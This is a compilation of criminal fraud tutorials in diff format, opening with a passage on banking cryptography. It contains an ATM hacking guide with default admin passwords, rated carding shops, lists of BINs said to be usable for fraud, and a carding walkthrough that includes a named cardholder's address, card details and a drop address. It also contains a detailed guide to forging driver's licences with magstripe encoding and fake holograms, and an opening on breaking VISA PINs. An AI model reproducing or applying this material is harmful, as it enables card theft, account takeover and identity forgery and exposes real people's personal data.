+MAC is quite small. (The MAC is defined as 16 bytes in ISO8583).
+5.3 Other financial cryptography applications
+As well as traditional uses of cryptography as described above, interbank networks (such as SWIFT) have
+historically been large users of cryptographic techniques.
+A plethora of new delivery mechanisms and far wider distribution of advanced technology to the public
+has increased both the interest in and the use of cryptographic techniques.
+In cases where cryptography is required for widespread dissemination to the public (such as PC based
+home banking) ordinary DES is too complex to manage securely. More appropriate and more secure
+algorithms such as RSA (A ?public key? encryption system) have evolved and been deployed in these
+environments - they are outside the scope of this paper but review of public key algorithms is especially
+encouraged where appropriate.
+
+Some corporate, EDI and treasury applications use highly secure DES with a combination of techniques -
+MAC, physical encryption, dynamic key exchange, smart card key storage and so on. In one
+implementation reviewed, the working key is changed every transaction by the result of a MAC key
+calculation residue (a so-called ?one time? key system).
+ATM Hacking Tutorial
+HOW TO HACK THE TRANAX MINIBANK 1500 ATM MACHINE
+“ENTER PASSWORD” will be displayed. Enter
+Master, Service or Operator Password.
+Defaults:
+Master =555555
+Service = 222222
+Operator = 111111
+#1- To access the Operator Function menu, hold the , and
+keys simultaneously for 2 seconds, release them and press 1, then press 2, then
+press 3. The timing of this procedure can be difficult at first.
+Note: The Operator Function menu can only be accessed when the machine is either
+in service (“swipe your card” screen) or out of service. If the machine is attempting
+to connect the host or initializing, you will not be able to use the key commands to
+access the Operator Function Menu.
+If you have trouble accessing the Operator Menu, power off the ATM and then either
+open the vault door or remove the paper from the printer and power back on. This
+will force the ATM to the Operator Menu.
+2- Once you successfully completed the key
+combination, you will be prompted to enter a
+password. There are 3 options for passwords.
+· Operator Password (allows access to basic
+menu structure)
+· Service Password (allows access to basic
+and diagnostic menus)
+· Master Password (allows access to all
+menus including setup parameters)
+Passwords are very important to maintaining
+security for your ATM. Your
+dealer/distributor will provide you with
+default password information.
+3- left is the complete Operator
+Function menu, depending on which
+password you entered (operators, service,
+master) you may not see certain functions.
+For example, if you use an operator password
+you will not see the Host Setup button, as
+you will not have access to that menu.
+
+good luck.
+AUTOMATIC CVV SHOPS RATED
+Here il be rating all the automatic CVV selling shops.
+vlt.cc - vault market - 95% rating - VERY GOOD
+pwnshop.cc - pawn shop - 80% rating - VERY GOOD TO GOOD
+cardshop.tv - card shop - 80% rating - VERY GOOD TO GOOD
+ccstore.ru - cc store - 75% rating - GOOD
+freshstock.biz - fresh stock - 65% rating - OK
+ccc.lc - SHOP - 60% rating - OK
+All the ratings are based on the
+-cvv quality and validity
+-how easy funds can be loaded
+-the quality of the support being provided by admin and owners of the shop
+Please feel free to add and comment on the shops you know.
+enjoy
+Avs Pass Bins
+For people who dont know what non-avs cards are here is the explanation:
+AVS (Address Verification System) is used to check if the billing address provided is correct. For
+example even if the card details (CCnum, exp.date, 3/4 digit security code) matches the correct info and
+the Billing address does not macth, the card is marked as "Declined" and the order does not proccess.
+AVS connects to the bank and verifies the info provided.
+However some banks do not allow this kind of verification, allowing the carder to input whatever billing
+information they want.
+
+Q) Why are non-avs card so useful?
+The answer is very simple. You can just input the shipping address as billing address when carding,
+means it would be same, which is a lot higher chance for the stuff to ship.
+So here we go.
+Visa:
+492142
+454623
+453904
+407220
+492942
+477912
+456469
+492942
+456004
+466188
+MasterCard:
+523232
+Awesome BINs
+Me and my partners have been carding for over 10 to 15 years.
+In my base of research over the last 2 years, i have selected these 101 BIN's as being to best card with in
+USA, EUROPEAN, ASIAN AND UK SHOPS POS (POINT.OF.SALE) systems. These cards on these
+BINs are proven to authorise for swipes of 600usd all the way to 12.5k usd per 1 swipe.
+Я и мои партнеры были кардинг более 10 до 15 лет.
+В моей базе исследования в течение последних 2 лет, я выбрал эти 101 BIN, как в том, чтобы
+лучшая карта в США, европейских и Великобритании МАГАЗИНЫ POS (POINT.OF.SALE)
+систем. Эти карты на эти бункеры оказалось разрешение на пойло из 600usd весь путь до 12.5k
+долл. США за 1 салфетки.
+601100 OK DISCOVER USA
+601120 OK DISCOVER USA
+601129 OK DISCOVER USA
+601130 OK DISCOVER USA
+601149 OK DISCOVER USA
+603532 1 Citibank (Home Depot) USA
+371267 15 AMEX USA GREEN
+371268 16 AMEX USA GREEN
+371269 14 AMEX USA GREEN
+371271 3 AMEX USA GREEN
+371273 4 AMEX USA GREEN
+
+371274 13 AMEX USA GREEN
+371275 15 AMEX USA GREEN
+371276 42 AMEX USA GREEN
+371277 48 AMEX USA GREEN
+371278 37 AMEX USA GREEN
+371279 28 AMEX USA GREEN
+371280 29 AMEX USA GREEN
+371281 44 AMEX USA GREEN
+371282 47 AMEX USA GREEN
+371310 19 AMEX USA BLUE FOR BUSINESS
+371311 14 AMEX USA GOLD
+371312 19 AMEX USA GOLD
+371313 26 AMEX USA GOLD
+71319 44 AMEX USA PLATINUM
+371320 OK AMEX USA CENTURION
+371321 51 AMEX USA PLATINUM
+371322 OK AMEX USA PLATINUM
+371323 92 AMEX USA SMALL CORPORATE CARD
+371324 75 AMEX USA SMALL CORPORATE CARD
+371544 38 AMEX USA CENTURION
+371545 63 AMEX USA CENTURION
+371546 63 AMEX USA CENTURION
+371547 30 AMEX USA CENTURION
+371548 49 AMEX USA CENTURION
+371549 48 AMEX USA CENTURION
+400216 1 Teller A.S. Debit PLATINUM Norway Oslo - NEW
+400226 20 Blackhawk Community Credit Union Debit CLASSIC United States of America Janesville
+Wisconsin WI NEW
+400229 1 Capital One Bank (Usa), National Association Credit BUSINESS United States of America
+Glen Allen Virginia VA NEW
+400264 18 ITS Bank Debit CLASSIC United States of America Johnston Iowa IA NEW
+400266 6 Columbia Community Credit Union Debit BUSINESS United States of America Vancouver
+Washington WA NEW
+400275 20 Fia Card Services, National Association (2) Credit BUSINESS United States of America
+Wilmington Delaware DE NEW
+400279 2 Sidell State Bank Debit CLASSIC United States of America Sidell Illinois IL NEW
+400284 12 First United National Bank Debit CLASSIC United States of America Fryburg Pennsylvania
+PA NEW
+400292 8 Eecu A Community Credit Union Debit CLASSIC United States of America Jackson Michigan
+MI NEW
+400309 2 The Bank of Nova Scotia Credit CLASSIC Dominican Republic NEW
+400336 24 Peapack-Gladstone Bank Debit CLASSIC United States of America Gladstone New Jersey NJ
+NEW
+400343 4 West Coast Bank Debit PLATINUM United States of America Lake Oswego Oregon OR NEW
+400344 OK Capital One Bank (Usa), National Association Credit PLATINUM United States of America
+Glen Allen Virginia VA NEW
+400375 15 Silverton Bank, National Association Credit BUSINESS United States of America Atlanta
+Georgia GA NEW
+400379 3 Fremont Bank Debit BUSINESS United States of America Fremont California CA NEW
+400382 2 The Monticello Banking Company Debit BUSINESS United States of America Monticello
+Kentucky KY NEW
+400600 1 Rockwood Bank Debit CLASSIC United States of America Eureka Missouri MO NEW
+400603 27 Signature Bank Debit CLASSIC United States of America Bad Axe Michigan MI NEW
+441238 68 First Federal Bank of Ohio Debit CLASSIC United States of America Galion Ohio OH NEW
+441241 1 Lancaster Red Rose Credit Union Debit CLASSIC United States of America Lancaster
+Pennsylvania PA NEW
+
+441242 5 Arrowhead Bank Debit CLASSIC United States of America Llano Texas TX NEW
+441251 94 Commerce Bancshares, Inc. Debit CLASSIC United States of America Kansas City Missouri
+MO NEW
+441254 39 Commerce Bancshares, Inc. Credit CLASSIC United States of America Kansas City Missouri
+MO NEW
+441276 8 Commerce Bancshares, Inc. Debit BUSINESS United States of America Kansas City Missouri
+MO NEW
+441277 18 Elevations Credit Union Debit CLASSIC United States of America Boulder Colorado CO
+NEW
+441278 6 Elevations Credit Union Credit CLASSIC United States of America Boulder Colorado CO
+NEW
+38421 2 |201| PLATINUM (CREDIT) | CITIBANK BERHAD | MALAYSIA
+438502 1 |101| CLASSIC (DEBIT) | WELLS FARGO BANK N.A. | USA
+438526 1 |101| CLASSIC (DEBIT) | STATE CENTER C.U. | USA
+438573 1 |101| CLASSIC (DEBIT) | WELLS FARGO BANK N.A. | USA
+438634 1 |101| CLASSIC (DEBIT) | SECURITYPLUS F.C.U. | USA
+438688 2 |101| CLASSIC (DEBIT) | MERIWEST C.U. | USA
+438736 1 |101| PLATINUM (CREDIT) | MAYO EMPLOYEES F.C.U. | USA
+438755 5 |101| CLASSIC (CREDIT) | SAN DIEGO COUNTY C.U. | USA
+516319 8 |201| STANDART (DEBIT) | WESTPAC BANKING CORPORATION | AUSTRALIA
+516320 1 |201| STANDART () | WESTPAC BANKING CORPORATION | AUSTRALIA
+516321 1 |201| () | WESTPAC BANKING CORPORATION | AUSTRALIA
+516330 1 |201| STANDART () | WESTPAC BANKING CORPORATION | AUSTRALIA
+517669 4 |101| GOLD (DEBIT) | HSBC BANK NEVADA N.A. | USA
+517800 11 |101| GOLD (DEBIT) | FIRST PREMIER BANK | USA
+517805 96 |101| PLATINUM (DEBIT) | CAPITAL ONE BANK | USA
+517873 1 |101| (DEBIT) | CU COOPERATIVE SYSTEMS | USA
+517945 1 |101| PLATINUM (DEBIT) | CHASE BANK USA N.A. | USA
+450998 46 VALES_INTERCONTINENTALES_S.A. CREDIT GOLD/PREM COSTA_RICA
+451477 1 AVAL_CARD_(COSTA_RICA),_S.A. CREDIT PLATINUM COSTA_RICA
+454738 1 TARJETAS_CUSCATLAN_S.A. CREDIT BUSINESS COSTA_RICA
+492151 16 VALES_INTERCONTINENTALES_S.A. CREDIT CLASSIC COSTA_RICA
+493189 2 AVAL_CARD_(COSTA_RICA),_S.A. CREDIT GOLD/PREM COSTA_RICA
+493190 2 AVAL_CARD_(COSTA_RICA),_S.A. CREDIT CLASSIC COSTA_RICA
+415080 1 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA
+415083 3 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA
+415086 3 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA
+476900 69 ZIONS_FIRST_NATIONAL_BANK CREDIT BUSINESS
+UNITED_STATES_OF_AMERICA
+477323 1 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA
+477324 1 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA
+477327 8 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA
+491473 4 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA
+491477 3 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA
+491485 3 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA
+491494 2 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA
+491901 2 NCSC_F.C.U. DEBIT CLASSIC UNITED_STATES_OF_AMERICA
+
+Bases of thing carding
+This article, I hope, will help beginners to answer myself immemorial question ?. To begin with we need
+to understand that here, as well as in any business, there is a chain and if simply to hammer somewhere a
+card, anybody home won't send the goods to you. As a rule this chain is realized by 2 persons the one
+who the goods and that who it accepts a carditis. To the beginner to do simultaneously both that and
+another isn't real almost. We will consider these two links more in detail further.
+To begin with it is necessary to find shop, it is natural online shop in which we will make purchase. It is
+not necessary to be greedy since to receive плазменник with a cinema for 10К it will not turn out for
+many reasons. We choose to themselves the type goods ноута or фотика, вобщем by more low 1К-
+1.5K ? for beginners it is optimum IMHO. We take a card Further, for purchase it needs to be prepared.
+Since to order on the address of its owner doesn't leave and the sense isn't present. It is necessary to order
+on дропа. Дроп it is citizen US with whom have dissolved that it has accepted a parcel and has sent it
+where will tell and for it has received the 30-50 dollars (+ геморняк on all life forward ? ыыы). But we
+will not be hurries up, we will assume at us there is here such card:
+name_on_card=mark s messina
+address1=60 plainfeild ave
+city=west haven
+state=CT
+zipcode=06516
+country=US
+credit_card=4*****0101504612
+exp_month=03
+exp_year=2008
+cvv2=282
+I hope to decipher this field it is necessary to nobody.
+Further it is necessary to make Enroll.
+For this purpose it is required to us SSN (Social Security Number) + DOB (Day of Birthday) + MMN
+(Mother Maiden Name). To find such information it is possible at shEn or ? (as advertizing) By the way
+in some banks for энрола, besides the listed data it is necessary ищё nobility PIN or ATM. To pass this
+degree of protection extremely difficult and нахрен not нада for such business. To learn to what bank the
+card concerns it is possible on a bin, i.e. on the first figures in card number. Use program CC2Bank (read
+here this theme - http://www.verified.ru/showthread.php?t=26). We go on a bank site Further, we come
+into section Enroll (if you visually can't find this section, испольуйте search on a bank site). We pass all
+offered countries Further, stage by stage entering on them the data, an e-mail it is possible to enter any,
+Jahu and not Hotmail certainly is desirable not. (I hope that it is necessary to use a proxy etc. it is not
+necessary to remind). You have received Online access to a card, here it is possible to look what balance
+on a card (it should surpass at least in 2-3 times planned purchase) and there is a section where it is
+possible to change the data on a card. (To describe as sections where I will not search for these buttons
+etc. ? since it silly, in each bank on a miscellaneous) are called. So if the balance good, goes to section for
+change инфы. It is possible to replace only Address1, City, State, Zipcode and Phone number.We take
+information of dropa, it will be for example:
+70 Tunstill Loop Rd
+Fayetteville
+TN
+37334
+(Thanks xTc for given инфу about the person, which already likely on plank beds).
+Open there is phone question on which it is necessary to accept a call from a shop and probably then from
+it to call. The blessing for this purpose exists various Ip the Telephony (use Google) where it is possible
+to buy external number. We buy phone of the same staff, as дроп. In this case Tennessee.
+Further we interrupt the data in a card on ours, will write how many it is necessary to wait for
+application ? usually couple of days, but everywhere on a miscellaneous. Therefore a card we will
+postpone for a certain time. After the lapse of two days a card it is necessary чекнуть if at you isn't
+
+present мерчанта near at hand or own x-login ? it is possible to make easier, to go on a type site nero.com
+or etc. trading in a software and to buy there not necessary херню for 20 dollars. If payment has passed
+successfully ? the card means is live and it is possible шопится. At вбиве a card it is necessary to use the
+OLD Name, number, exp and CVV a code, other data we take recently changed.
+We go on a site of shop and to affairs the order. (Don't press close to pay as much as possible fast
+delivery of the goods.) u????u addresses and шипинг (i.e. deliveries) now identical for the clear reasons.
+After the order to you is made will send the letter where will tell that you need to be called or to you will
+call, therefore be online (don't forget about time zones). If you can't talk on eng ? ask skilled
+прозвонщика. After school ?Hello. My name is Tom. How are you? ? with nasty кацапским accent you
+will send нахуй)) Further if by phone you have confirmed the order successfully, to you will give Track
+number on which it will be visible (through a site магаза in certain section) as well as where now the
+goods and when it will receive дроп. (By the way never call in магаз if you about it haven't asked ?
+деклайн it is guaranteed). Then work дроповода, he is necessary for calling дропу with to instruct where
+to send the goods, what service etc. ? it is possible to send the goods on the buyer, some home send
+themselves =)) This your business already.
+Good luck.
+Basic ID Making [TUTORIAL]
+I will first run down the things that you will need. I am going to tell you what you need to make a
+professional looking state driver lisence, you may not need all of this but it is what is needed to make it
+look real if you don’t use something that I tell you to it’s your call, your ID may end up looking different
+than it should.
+• Photo editing software (I personally suggest Adobe Photoshop 6.0 or above)
+• Prior knowledge of Photoshop is a must
+• State identification template
+• A scanner if you need to scan a photo of yourself
+• Epson printer (c82 or 820) or a laser printer
+• Laminator
+• Teslin (Type of teslin depends on what kind of printer you have)
+• Magstrip encoder (not a nessecity but to make a professional identification card it is needed)
+They’re may be other supplies that you need depending on what state you do, and if it has a hologram,
+that will be explained later in the article.
+Okay the first step would be to get a template, these are readily available in more than one place IF you
+know where to look. Me being the nice guy that I am will help you with that factor. Just search a search
+engine (google?) www.google.com or any p2p program should be more than sufficient, otherwise you
+may know somebody who will sell them to you or trade them. There are of course other options, you can
+make your own, which of course entails tedious work, taking days or even weeks. Or you could scan an
+ID that you already have and edit it that way.
+Okay so let’s say you have your template and you have photoshop, it’s time to get crackin’.
+
+So you need to open up photoshop, and start editing your information. Get your picture in the box and
+resize the image so you can print.
+When it comes time to print it may be a bit difficult.
+I am going to assume that you are using single sided Teslin. You will first need to find the coated side of
+the Teslin paper, now this may take a little bit of experience to figure it out. The correct side is a bit
+smoother than the other. Just put it in between you fingers and rub the paper until you figure out what
+side is smoother, if you cant figure it out it’s not a problem, you’ve got a 50% chance of getting it right.
+You will know weather or not it was right after you print for obvious reasons, the ink will bleed and look
+really bad. In which case you just flip it over and print it on another position on the teslin.
+After you have the right side picked out , you might want to mark the corner with a pen. Then place the
+teslin in the printer so that it will print on the correct side
+Configuring the 8up Template
+Now that you are ready to print, you will need the 8up Teslin Template. You can download it here.
+After you download it, unzip it and open it in Photoshop. Open your finished template as well. Before
+you can print, you need to check the resolution of the temp you are using and match the 8up temp's
+resolution to it. To do this, click on the window of your template to make it active, go to the Image menu
+and click Image Size. Look at the Resolution. It should have a number like 1200 pixels/inch. That is the
+DPI of the temp you are using.
+Now, switch over to the 8up temp that you should already have open. Go back to Image Size under the
+Image menu. Make sure the Resolution is the same between the two temps. The 8up temp I have hosted
+here on this site is already in 1200 DPI, but if you have downloaded it from somewhere else in the past
+(such as Brainstorm ID Supply), it may be in 600. If it is not the same, type in the number it should be
+and click OK. Photoshop will then convert the 8up temp to the correct resolution.
+Copying and Pasting on to the 8up Template
+Activate the window of your front template in Photoshop. Under the Select menu, click All. Go to the
+Edit menu and click Copy Merged. You should copy it merged since you won't need all those layers just
+to print.
+Switch over to the 8up temp and go back to the Edit menu and click Paste. You should now have a new
+layer in the 8up temp containing your front temp. Select that layer (if it isn't already selected) in the
+Layers window. Select the Move tool by either clicking on it in the Tools palette or by pressing V. It will
+help if you check the box next to Show Bounding Box at the top. If you don't see this option, go to the
+Window menu and click Options.
+There are 8 rectangles on the 8up temp (hence the name). Decide where you want to print the front of the
+license. When I've got a blank sheet of Teslin, I start by printing the front in the top left. Move the layer
+to the rectangle where you want it to print. Do this by simply dragging it with the Move tool. It should
+snap into place inside the rectangle. Hopefully, it will be the correct size, but if it isn't you may need to
+resize it to fit inside the rectangle by dragging the borders. Remember how you checked the Show
+Bounding Box option? This is why.
+Adjusting Print Settings
+Click Print under the File menu. Click Properties. Now you must adjust the print settings to match the
+printer and the Teslin (single or double sided). Here are some settings that I recommend for the printer
+that I use:
+Epson 820 - Single Sided Teslin - Front:
+* Under Mode, Choose Custom
+* Click Advanced
+* Media Type: Photo Paper
+* Ink: Color
+* Print Quality: Photo - 2880dpi
+* Color Management: No Color Adjustment
+* Uncheck Edge Smoothing
+
+* Uncheck Epson Natural Color
+Epson 820 - Single Sided Teslin - Back:
+* Under Mode, Choose Custom
+* Click Advanced
+* Media Type: Matte Paper - Heavyweight
+* Ink: Black
+* Print Quality: Photo - 1440dpi
+* Color Management: No Color Adjustment
+* Uncheck Edge Smoothing
+* Uncheck Epson Natural Color
+Epson C82 - Laser Teslin - Front:
+* Choose Matte Paper - Heavyweight
+* Choose Photo RPM
+* Uncheck all print options except SuperMicroweave
+* Select PhotoEnhance
+* Set Tone equal to Vivid
+* Set Effect to High Sharpness
+* Turn Digital Camera Correction off
+Epson C82 - Laser Teslin - Back (Assuming the back is only black, if not use the front settings):
+* Choose Matte Paper - Heavyweight
+* Choose Best Photo
+* Check Black Ink Only
+* Uncheck Edge Smoothing
+Printing the Front
+After you've adjusted the settings to your liking, it's time to finish up and print the front. You should still
+have the Print window open, but if not go back to Print under the File menu. Now all that is left to do is
+click OK. Just sit back and wait because it will take a few minutes. After it's done printing, let it dry for a
+couple of minutes before you touch it. You wouldn't want to smear the ink on that great looking novelty
+you just printed, would you?
+Printing the Back
+Now it's time to do the back. The procedure is nearly the same as printing the front. The only differences
+are where you place the back temp layer on the 8up temp to print, the side of the Teslin you print on, and
+(if you are using single sided Teslin) the print settings that you use.
+Follow the steps in this guide the same way you did for the front, until the part about placing the layer on
+the 8up temp to print. You will want to put the back temp in the rectangle that was to the right or left of
+the rectangle you printed the front temp from. For example, you printed the front temp by placing it in the
+top left rectangle on the 8up temp. In this case, you'll want to put the back temp in the top right rectangle.
+You will need to flip over the Teslin so that the back will print on the opposite side of the front. Use your
+common sense, and think about how the printer feeds the paper through.
+Adjust the print settings if you are using single sided Teslin, or for double sided, check to make sure they
+are still the same. Now you are ready to print it.
+If you did everything right, you should end up with a front and back that look great and are aligned
+perfectly (or at least very close
+The following information was borrowed from an article written by The Jerm
+This is a basic guide to encoding the magstripe on driver licenses/ID’s. First, you need to have an
+MSR206 magstripe encoder. If you don't have one already you can find them easily through an internet
+search or eBay. It'll run you about $600. Okay, now you need some software. You can download my
+program for free at http://thejerm.0catch.com. I won't cover how to use the software here. It's pretty self-
+explanatory but if you run into any problems just read the readme.txt file that comes with it.
+Driver License/ID Encoding
+If you want to encode an ID there are two ways to go about it:
+1. You can read the magstripe from a real ID and then manually edit the tracks. Here's an example of
+track 1 from an Arizona license:
+AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^
+
+Now, if your name is Joe Blow and you live at 123 Fake St. in Tuscon you could easily change it to:
+AZTUCSON^BLOW$JOE^123 FAKE ST^
+If you just want to change the birth date it can be found at the end of track 2 in this format:
+YYYYMMDD. Most states follow the AAMVA standard pretty closely. The AAMVA standards
+document can be downloaded here:
+http://aamva.com/Documents/stdAAMVAD...ecs_092003.pdf
+2. You can use the built-in ID tracks generator in my program. Unfortunately for most of you I’ve only
+included the formats for CA and AZ. If you want to do a little work you can create a script for your own
+state’s format. The instructions for doing that are in the readme.txt file that comes with the program. I’d
+recommend copying the AZ script and editing it rather than starting from scratch.
+AAMVA Format
+Here’s a rundown of the AAMVA format with each part color coded for easy reference:
+Sample:
+AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^
+6360260401234567=380719800711=
+!!85023 D M601185BRNGRN
+Track 1:
+AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^
+AZ – State Abbreviation. Fixed length of 2 characters.
+PHOENIX – City. Maximum length is 13 characters. If city is less than 13 characters it must be followed
+by ^ field separator. If city is more than 13 characters it is truncated to 13. No ^ needed if city is 13
+characters long. Examples:
+PHOENIX^
+SANTA BARBARA
+SAN LUIS OBIS (San Luis Obispo)
+ADAMS$JOHN$QUINCY – Name. Maximum length is 35 characters. If less than 35, must be followed
+by ^ field separator. Each name is separated by $. Format is LAST$FIRST$MIDDLE or LAST$FIRST if
+no middle name is used.
+1433 N ELM ST$APT 3 – Address. Maximum length is 77 minus the total number of characters of City +
+Name fields. $ is used to separate address lines. If address is less than 29 characters it must be followed
+by ^ field separator.
+Track 2:
+6360260401234567=380719800711=
+636026 – Issuer Identification Number (IIN). Every state has a unique IIN. IIN is 6 digits long and starts
+with 636. A list of some of the IIN’s is included at the end of this guide.
+0401234567 – License/ID Number. Maximum length is 13 characters. If number is longer than 13
+characters, extra characters are placed at end of track. If license/ID number contains letters, they are
+converted to 2-digit number (A=01, Z=26). For example, the sample number I used was D01234567 but
+got converted to 0401234567. License/ID number must always be followed by = field separator
+regardless of length.
+3807 – Expiration Date. Format is YYMM so this example expires in July of 2038 (AZ licenses expire on
+65th birthday). Some states may use special codes in place of the expiration month. Codes are as follows:
+If MM=77 then license is non-expiring.
+If MM=88 the expiration date is after the last day of birth month one year from the month (MM) of birth
+date and the year (YY) of expiration date.
+If MM=99 then the expiration date is on the month (MM) and day (DD) of birth date and the year (YY)
+of expiration date.
+19800711 – Birth Date. Format is YYYYMMDD so this example is July 11, 1980.
+= – License/ID Number Overflow. If License/ID number is longer than 13 characters extra characters go
+here, otherwise a = field separator is placed here.
+Track 3:
+!!85023 D M601185BRNGRN
+!! – Unknown. These two characters don’t seem to conform to the AAMVA standard and the standards
+document contradicts itself. It’s probably safe to copy whatever’s in this spot on a real ID.
+85023 - Zip Code. Fixed length of 11 characters. If Zip Code is less than 13 characters add spaces to
+make it 13.
+
+D - Class. Fixed length of 2 characters. If only 1 character add space.
+(10 spaces) – Restrictions. Fixed length of 10 characters. If not present fill with spaces.
+(4 spaces) – Endorsements. Fixed length of 4 characters. If not present fill with spaces.
+M – Sex. Fixed length of 1 character. M for male, F for female.
+601 – Height. Fixed length of 3 characters. Feet and inches. Sample is 6’1”.
+185 – Weight. Fixed length of 3 characters. Weight is in pounds. If less than 100 lbs. use 0 for first
+character.
+BRN – Hair Color. Fixed length of 3 characters. Examples are BRN, BLN, RED, BLK.
+GRN – Eye Color. Fixed length of 3 characters. Examples are GRN, BLU, HZL, BRN.
+There may also be some discretionary data unique to each state at the end of track 3. One more thing,
+make sure you set the track format to AAMVA under Card Types on the Settings tab or you may get an
+error when you try to write to a card.
+Issuer Identification Numbers
+Alabama 636033 Louisiana 636007 Nova Scotia 636013
+Arizona 636026 Maine 636041 Ohio 636023
+Arkansas 636021 Maryland 636003 Oklahoma 636058
+British Columbia 636028 Massachusetts 636002 Ontario 636012
+California 636014 Michigan 636032 Oregon 636029
+Colorado 636020 Minnesota 636038 Pennsylvania 636025
+Connecticut 636006 Mississippi 636051 Rhode Island 636052
+District of Columbia 636043 Missouri 636030 Saskatchewan 636044
+Delaware 636011 Montana 636008 South Carolina 636005
+Florida 636010 Nebraska 636054 South Dakota 636042
+Georgia 636055 Nevada 636049 Tennessee 636053
+Guam 636019 New Brunswick 636017 US State Dept 636027
+Hawaii 636047 New Hampshire 636039 Texas 636015
+Idaho 636050 New Jersey 636036 Utah 636040
+Illinois 636035 New Mexico 636009 Vermont 636024
+Indiana 636037 New York 636001 Virginia 636000
+Iowa 636018 Newfoundland 636016 Washington 636045
+Kansas 636022 North Carolina 636004 Wisconsin 636031
+Kentucky 636046 North Dakota 636034
+That’s about it. Good luck!
+I realize this guide is getting a bit long but we’re almost done.
+The holograms in my opinion are the worst part of the entire process, it may just be me but I am not a big
+fan of this, for others, it’s the exact opposite, but I will still give you the information. There is more than
+one method to making holograms, and for the sake of time will not go over them all, maybe in the future I
+will make another guide including them all, but for right now I will just cover one of them.
+Many of you may know what method I will be telling you about, and your sitting there thinking PhotoEZ,
+well your wrong, I don’t like it, in fact, I hate it, instead I am going to tell you about an easier, cheaper
+way to make your holograms and here it is.
+Reffered to as the rubber stamp method The main reason people rule out rubber stamps in this business
+anymore, is because they think that the only stamps that can be made are the ones you buy at office
+stores, and only contain letters, numbers, etc. However- in most medium sized cities, there are stamp
+shops that are able to produce VERY high-quality, detailed stamps, for around 10-20$ The best way to
+get your CUSTOMIZED stamp made is to print out the hologram you wish to be made, with the exact
+sizes. Keep in mind how you will be placing the stamp on your medium of choice, be it teslin, lamination,
+overlam, or whatever. When you print your hologram image out- be sure its not backwards- and tell the
+stamp producers this too, so when you stamp your teslin, overlam, lam...etc... it shows up facing you, and
+not like a normal stamp, that would need to be facing the opposite direction on the actual stamp. lol, i
+
+hope this part hasn't confused you- because the first couple of times i had stamps made i had to keep
+making sure it would come out right before i took it in. I suggest you give the stamp producers an
+example of how you want it done, on your medium of choice so it comes out right, and not in the opposite
+direction. To find the stamp producers that can take in scanned images (your printed out hologram) and
+make stamps out of them- just look in your yellow pages under "Rubber stamps" and call them to make
+sure they can do this process before you go.
+Ok, so that was the easy, no talent method for getting great quality rubber stamps. If you are really good
+w/ art type stuff- and want a semi-hard challenge, goto the art department at your school and kindly ask
+the teacher if they had some linoleum-print blocks that you could borrow for a project- along with the
+proper chizling tools to cut out the stamp. Getting these items assumes that you are in highschool, and
+you have an art dept. w/ these supplies. If not- you could probably just goto an art store and look for the
+supplies yourself. (as mentioned above- you need a Special chizzle for linoleum block carving, and the
+linoleum block itself) although I've never needed to do this before- because I'm still in school Now, with
+your hologram image that you need to print out from your computer- cut out the parts of it that are
+colored in with an exacto knife, and leave the white parts solid. You now have a stencil, basically. Draw
+this onto the linoleum block, and make sure things look good...you may have to do some of the drawing
+without the stencil in the smaller areas, but its not too difficult once you get the hang of it. After this,
+carve out the areas on the block where there was white on the original printout. I suggest using a small
+tool for this- so its easier to get into the little nooks and crannies of the holo. When you get the basic
+outline of everything around your holo, you now need to put a pvc id, or credit card size object over the
+holo and place it exactly where the holo should be on the id, when you make it. Carve this blank area out,
+being sure not to cut into the actual hologram, and after this part is done, you're ready to put the
+interference gold ink on (i suggest pearl-ex + boss gloss embossing gel- for stamps) and do this by mixing
+the two things together, putting it all on the cardboard back of a notbook, making sure it gets well "inked"
+then placing your lam, overlam, teslin's inside over it- so it can be stamped, and then its ready to go. Take
+note- this second method pretty much only works on the NJ holo- as its the easiest, least complex holo out
+there, however you can also make your own "offical-looking" stamps with this method too.
+The easiest method by far for using stamps is to simply have one made at an stamp shop that can make
+them from scanned images. If you arent very fammiliar with art shit or linoleum block printing I would'nt
+attempt the second method. I only included it because i was bored one day during art, and decided to
+"take" a linoleum block and the chizzels, and make myself an NJ holo. All in all, i prefer this method over
+PhotoEZ, because they come out High-quality and all i have to do is press down the rubber/linolem stamp
+on the "ink slab" (back of notebook) and then apply it to the lam, teslin or overlam. I hope you'll at least
+try the first method, as I'm sure you'll find that the results kick ass.
+I realize this guide got quite long and I apologize but I hoped you enjoyed reading it as much as I enjoyed
+writing it. I want to thank everyone who either helped with this text, or created the different methods
+explained throughout the article.
+Once again be responsible with the information held out in front of you.
+I wish you luck with whatever the future may hold for you.
+Breaking VISA PIN
+Have you ever wonder what would happen if you loose your credit or debit card and someone finds it.
+Would this person be able to withdraw cash from an ATM guessing, somehow, your PIN? Moreover, if
+you were who finds someone's card would you try to guess the PIN and take the chance to get some easy
+money? Of course the answer to both questions should be "no". This work does not deal with the second
+question, it is a matter of personal ethics. Herewith I try to answer the first question.
+All the information used for this work is public and can be freely found in Internet. The rest is a matter of
+
+mathematics and programming, thus we can learn something and have some fun. I reveal no secrets.
+Furthermore, the aim (and final conclusion) of this work is to demonstrate that PIN algorithms are still
+strong enough to provide sufficient security. We all know technology is not the weak point.
+This work analyzes one of the most common PIN algorithms, VISA PVV, used by many ATM cards
+(credit and debit cards) and tries to find out how resistant is to PIN guessing attacks. By "guessing" I do
+not mean choosing a random PIN and trying it in an ATM. It is well known that generally we are given
+three consecutive trials to enter the right PIN, if we fail ATM keeps the card. As VISA PIN is four digit
+long it's easy to deduce that the chance for a random PIN guessing is 3/10000 = 0.0003, it seems low
+enough to be safe; it means you need to loose your card more than three thousand times (or loosing more
+than three thousand cards at the same time until there is a reasonable chance of loosing money.
+What I really meant by "guessing" was breaking the PIN algorithm so that given any card you can
